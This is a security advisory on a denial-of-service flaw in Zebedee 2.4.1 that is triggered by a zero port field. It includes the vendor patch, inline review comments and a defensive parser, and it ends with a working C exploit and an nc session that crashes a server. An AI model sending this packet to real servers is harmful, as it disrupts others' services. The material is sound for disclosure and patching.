Zebedee DoS
Source: www.vfocus.net  Author: Shiraishi.M  Published: 2005-09-14

Summary
"Zebedee is a simple program to establish an encrypted, compressed tunnel for TCP/IP or UDP data transfer between two systems." Lack of proper validation of the user provided port range allows attackers to cause the Zebedee program to crash.

Credit:
The information has been provided by Shiraishi.M.

Details
Vulnerable Systems:
* Zebedee version 2.4.1

Immune Systems:
* Zebedee version 2.4.1a

The server crashes whenever "0" is received as the port number in the protocol option header.

$ od -tx1z -Ax zebedeeDoS
000000 02 01 00 00 20 00 00 06 00 00 00 80 ff ff ff ff >.... ...........<
000010 0b d8 30 b3 21 9c a6 74 00 00 00 00 >..0.!..t....<
00001c

The 9th and 10th bytes of the header, the port field, contain 0x00.

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 0, rcvd 0

$ nc -vv zebedeehost 11965 < zebedeeDoS
zebedeehost [192.168.xxx.xxx] 11965 (?) open
sent 28, rcvd 2

$ nc -vv -z -w2 zebedeehost 11965
zebedeehost [192.168.xxx.xxx] 11965 (?) : Connection refused
sent 0, rcvd 0

$

In zebedee.c, look at the function makeConnection(), which is called from server(); the sanity check at line 1705 reads:

```c
/* Sanity check */

assert(host != NULL && port != 0);
```

Here, if the port number is 0, the assertion fails, and both the child and parent processes appeared to quit running.

This issue occurs when no "allowed redirection port" is configured (the default).

Vendor Patch:
*** zebedee-2.4.1/zebedee.c Tue May 28 07:31:15 2002
--- zebedee-2.4.1A/zebedee.c Tue Sep 6 21:32:03 2005
***************
*** 22,28 ****
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1"

#include <stdio.h>
#include <stdlib.h>
--- 22,28 ----
*/

char *zebedee_c_rcsid = "$Id: zebedee.c,v 1.25 2002/05/28 06:31:15 ndwinton Exp $";
! #define RELEASE_STR "2.4.1A"

#include <stdio.h>
#include <stdlib.h>
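Review bot: RELEASE_STR becomes "2.4.1A" here while the advisory's "Immune Systems" entry spells the fixed release "2.4.1a"; pick one casing so the string a scanner or operator reads back from the binary matches the advisory. The zebedee_c_rcsid line directly above still carries revision 1.25 from 2002/05/28, which is only correct if the $Id$ keyword is expanded on commit; otherwise it should be updated alongside RELEASE_STR.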
***************
*** 3936,3941 ****
--- 3936,3950 ----
assert(AllowedTargets != NULL);

/*
+ ** Port 0 is invalid data in the request packet, never allowed
+ */
+ if (port == 0)
+ {
+ message(0, 0, "request for target port 0 disallowed");
+ return 0;
+ }
+
+ /*
** If the address is all zeroes then we will assume the default target
** host, if any.
*/
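Review bot: the port == 0 rejection sits after assert(AllowedTargets != NULL) and before the default-target-host handling, so a zero port is refused before the request can reach the assert(host != NULL && port != 0) in makeConnection() that the advisory identifies as the crash site; that is the right layer, since assert() is a programmer-error check and not input validation. Two points to confirm from the caller, which is outside the hunk: that return 0 is handled as an ordinary refused request (the same path as a target outside the allowed list) rather than a fatal condition, and that message(0, 0, ...) is emitted at a level operators normally log, since "request for target port 0 disallowed" is the only trace of the probe once it no longer crashes the server.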

Workaround:
Setting up allowed redirection ports will address this issue.
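The header layout from the od dump and the vendor fix above, worked as an added example (my code, not the advisory's or the Zebedee project's): a parser for the 28-byte request that validates the port field and refuses 0 with the patch's message instead of letting the request reach an assert(). Field names are taken from the PoC comments; big-endian byte order and the function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* 28-byte Zebedee request header as captured in the advisory's od dump; field
 * names follow the PoC comments, big-endian byte order is an assumption. */
#define ZBD_HDR_LEN 28
struct zbd_request {
    uint16_t version, flags, max_msg, compression, port, key_len;
    uint32_t key_token, target_addr;
    uint8_t  nonce[8];
};
static uint16_t be16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const unsigned char *p) { return ((uint32_t)be16(p) << 16) | be16(p + 2); }
/* Validate before acting: 0 = ok, -1 = short header, -2 = target port 0, which
 * 2.4.1 only caught with assert() (process exit) and 2.4.1a logs and refuses. */
int zbd_parse_request(const unsigned char *buf, size_t len, struct zbd_request *out)
{
    if (len < ZBD_HDR_LEN)
        return -1;
    out->version     = be16(buf);
    out->flags       = be16(buf + 2);
    out->max_msg     = be16(buf + 4);
    out->compression = be16(buf + 6);
    out->port        = be16(buf + 8);
    if (out->port == 0) {
        fprintf(stderr, "request for target port 0 disallowed\n");
        return -2;
    }
    out->key_len     = be16(buf + 10);
    out->key_token   = be32(buf + 12);
    memcpy(out->nonce, buf + 16, sizeof out->nonce);
    out->target_addr = be32(buf + 24);
    return 0;
}
/* The crashing request, byte for byte from the advisory's od output. */
static const unsigned char ZBD_DOS_PACKET[ZBD_HDR_LEN] = {
    0x02, 0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x80, 0xff, 0xff,
    0xff, 0xff, 0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, 0x00, 0x00, 0x00, 0x00 };
/* Parse the advisory's packet with its port field (bytes 9-10) set to `port`;
 * port 0 leaves it unchanged. Returns the parsed port or the parser's error. */
int zbd_demo_parse(uint16_t port)
{
    unsigned char b[ZBD_HDR_LEN];
    struct zbd_request r;
    memcpy(b, ZBD_DOS_PACKET, ZBD_HDR_LEN);
    b[8] = (unsigned char)(port >> 8); b[9] = (unsigned char)(port & 0xff);
    int rc = zbd_parse_request(b, ZBD_HDR_LEN, &r);
    return rc == 0 ? (int)r.port : rc;
}
```

With the packet unchanged the parser returns -2 and logs the refusal; with the port bytes set to 0x2ebd (11965, the listener port in the session above) it parses normally.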

Exploit:
```c
/*
 * Build and use:
 * $ gcc -o mkZebedeeDoS mkZebedeeDoS.c
 * $ ./mkZebedeeDoS > zebedeeDoS
 * $ nc targethost port < zebedeeDoS
 */

#include <stdio.h>

int main(int argc, char **argv)
{
    /* 28-byte Zebedee request header with the port field set to 0;
       unsigned so that the 0xff bytes are not narrowed into a signed char */
    unsigned char data[] = {
        0x02, 0x01,                                     // protocol version
        0x00, 0x00,                                     // flags
        0x20, 0x00,                                     // max message size
        0x00, 0x06,                                     // compression info
        0x00, 0x00,                                     // port request: value = 0x0
        0x00, 0x80,                                     // key length
        0xff, 0xff, 0xff, 0xff,                         // key token
        0x0b, 0xd8, 0x30, 0xb3, 0x21, 0x9c, 0xa6, 0x74, // nonce value
        0x00, 0x00, 0x00, 0x00                          // target host address
    };
    size_t i, size = sizeof data;                       // 28 bytes

    /* write the raw header to stdout, byte by byte */
    for (i = 0; i < size; i++) {
        printf("%c", data[i]);
    }

    return 0;
}

/* EoF */
```
